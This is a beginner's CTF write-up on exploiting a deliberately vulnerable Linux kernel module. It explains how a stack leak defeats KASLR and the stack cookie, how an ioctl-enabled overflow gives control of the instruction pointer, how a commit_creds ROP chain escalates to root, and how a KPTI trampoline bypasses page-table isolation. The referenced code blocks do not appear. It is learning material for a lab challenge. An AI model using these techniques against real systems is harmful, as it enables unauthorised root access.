This writeup will cover my first foray into linux kernel exploitation. Disclaimer, I just started learning kernel pwn this month, so some information here might be incomplete. I plan to improve it after I learn a little more about the kernel.
Since the CTF was held and aimed for beginner-intermediate players, it is a safe assumption that this is an easy and introductory kernel pwn challenge. We are given the remote server details + challenge files in easy_kernel.tar.gz
we were given a bunch of files which help setup the kernel environment, this includes important files and directories such as bzImage
, vuln.ko
, fs
. the following are a brief description of what the given files are:
bzImage
: the compressed Linux kernel, we need to extract this into a vmlinux
kernel ELF binary to be used for debugginginitramfs.cpio.gz
: linux file system that is compressed with cpio
and gzip
.fs
: the decompressed version of the linux file system used. the usual linux files/directories such as /bin/
, /etc
+ other challenge files can be located here.vuln.ko
: the vulnerable linux kernel driver, this is the target which needs to be exploited.First off, we need to extract the kernel ELF from bzImage
using a script: extract_image.sh. This step is needed since we want to get some ROP gadgets that we can use later (and it takes a long time since the kernel is large, so getting ROP gadgets early will save us some time in the long run)
The other .sh
files are some bash scripts which automate some stuff such as taking a look how the pow is calculated, starting the QEMU emulator and rebuilding/compressing the file system.
Notable flags:
-cpu
: specifies the cpu model, here some kernel mitigations are also applied (in this case: +smep
, +smap
)-kernel
: specifies which kernel image file to use-initrd
: specifies the compressed file system-append
: specifies additional boot options; kernel command line (?). From this flag we can see that kaslr
is enabled.A brief description of the kernel mitigations that are present for this challenge (I need to elaborate on this further, still trying to fully understand how they are used):
SMEP
: this feature marks all the userland pages in the page table as non-executable when the process is in kernel-mode. Basically kills ret2usr shellcode.SMAP
: complementing SMEP, this feature marks all the userland pages in the page table as non-accessible when the process is in kernel-mode, which means they cannot be read or written as well.KASLR
: similar to userspace ASLR, it randomizes the base address where the kernel is loaded each time the system is booted.KPTI
: kernel-page table isolation works by better isolating user space and kernel space memory. the qemu launch script doesn't explicitly mention kpti but according to the challenge author, newer kernel versions have it by default:Kernel debugging is painful (at least for me who is just getting started with it), so modifying the kernel environment will allow us to have an easier time while developing an exploit. Here are some of the things that I revised in the qemu launch script:
-s
flag: Shorthand for -gdb tcp::1234
, i.e. open a gdbserver on TCP port 1234. needed for remote debuggingkaslr
by changing the -append
argument to nokaslr
I also commented out a line on the fs/init
file, basically allowing us to run the kernel as root.
Kernel modules are very synonymous to userspace libraries like libc.so.6
. Modules/Drivers are loaded into kernel space and run with the same privileges as ring-zero. Userspace code can interact with the kernel by first acquiring a handle to a kernel module, then reading/writing data into it through various channels (read/write/ioctl/etc.)
For a better reading, I suggest: https://blog.sourcerer.io/writing-a-simple-linux-kernel-module-d9dc3762c234
Like what we would normally do with an ELF binary, we can begin by analyzing the module with GHIDRA. Here is the function listing:
init_func
and exit_func
can be seen as the entry and exit points for the module, respectively.
init_func
registers a device file named /proc/pwn_device
and we will be interacting with this to exploit the module.
sopen
simply prints the string "Device opened" when we successfuly open the device file.
The sread
functionality simply prints out the string "Welcome to this kernel pwn series\x00" when we do a SYS_read
call to the file descriptor for /proc/pwn-device
. It does this by copying the string from the stack into a userspace buffer that we provide.
An important thing to note is that not only do we control the buffer address but also how many bytes we should read. Since we can control bytes_to_read
this means that we can read arbitrary values from the kernel stack, thus leading to memory leaks allowing us to bypass KASLR.
This is what the stack looks like before the call to copy_user_generic_unrolled
, we can see the welcome string, some kernel address offsets and the kernel stack cookie. We will be retrieving these values later on.
sioctl
allows us to change the value of the MaxBuffer
variable when we provide a cmd value of 0x20. This seems really suspicious.
Now here is the juicy part, it copies data from userspace and stores it into kernel_buffer which is on the kernel stack. Since we can again control bytes_to_copy
and more importantly MaxBuffer
, we can induce a buffer overflow. We don't have to worry about the cookie, since we can leak it from sread
. After that, we have instruction pointer control on the kernel.
First off, I reused some template code which helps preserve the state of some registers. This will be useful later for when we want to return from kernel-space back to userland.
Next, we open a handle to /proc/pwn_device
then proceed to read from it.
we successfully read 256 bytes from the device, all which include important kernel addresses and cookie values. After a while of figuring out which addresses we can reliably use, I settled for the ones at indexes 14 and 18. Since kaslr was off while debugging, I calculated the kernel base address offset through the following process:
Currently, here is what our current exploit looks like:
What it simply does is to retrieve values from the leak and calculate the base address for the kernel. Afterwhich, we send an ioctl
call to overwrite maxsize, allowing us to perform a buffer overflow when we write
to the device. As we can see, we have triggered a kernel panic since we have overwritten the kernel stack cookie.
When disassembling the swrite
function, we can see that it loads the cookie into the stack at [rsp + 0x80]:
In theory, we can start overwriting the cookie at stack offset 16 (0x80/8). To test the idea, I wrote the following code:
Before the call to copy_user_generic_unrolled
, the stack looks like this:
After our payload has been written:
We seem to be correct. Notice that what follows after the cookie is some value (0x80) then the return address 0xffffffff8123e2e7
which we can see in the following screenshot:
I made a small adjustment to my payload, which just preserves the kernel stack cookie, the value next to it with a dummy, then overwriting the return address:
Running the exploit causes a general protection fault in user access. non-canonical address
since we have replaced RIP with an invalid address:
Now that we can control the kernel instruction pointer, our next phase should be escalating privileges.
Unlike userland exploits in which our target is to spawn a shell, the goal for kernel exploits is different: to escalate the privileges of the running process (the exploit) from some basic user to root, then spawn a root shell. To do this, we take advantage of the task_struct
structure:
The kernel tracks the privileges + other additional data of every running process. We are interested in the process credentials. Taking a look at the cred
struct reveals our key targets:
The cred struct contains the eUID of the task. If we were somehow able to overwrite this value with 0, then we can have root privs. To do this, we use two kernel APIs: commit_creds
and prepare_kernel_cred
.
cred
struct. If we pass NULL/0 as the reference struct argument, it will return a cred struct with root privs
Since these functions are part of the kernel, we can include them into the list of addresses that we want to leak:
The next step of our payload will be to construct a rop chain that basically calls commit_creds(prepare_kernel_cred(0))
For this part, I mostly relied on writeups to know which gadgets to use. Initially my exploit code looked like this:
The idea was that after calling prepare_kernel_cred(0)
, the resulting cred
struct will be moved to rax
. We need a way to move it from rax
into rdi
, passing it as an argument to commit_creds
. But there is no exact ROP gadget to do just that. Instead we did the following:
After that bit, we proceed to the next rop gadget that calls swapgs
which swaps the GS
register from kernel-mode to user-mode. Then we continue to call iretq
which allows us to return to user-mode.
The problem with this approach is that I wasn't able to return to userland properly. This becomes clear after we return to a userland function, we still see some kernel pointers/addresses in the stack:
The reason is because of KPTI. Even though we have already returned the execution to user-mode, the page tables that it is using is still the kernel’s, with all the pages in userland marked as non-executable.
To bypass KPTI, I used a method called KPTI trampoline. This method is based on the idea that if a syscall returns normally, there must be a piece of code in the kernel that will swap the page tables back to the userland ones, so we will try to reuse that code to our purpose. That piece of code is our KPTI trampoline, and what it does is to swap page tables, swapgs and iretq.
Our kpti_trampoline resides in the function swapgs_restore_regs_and_return_to_usermode()
.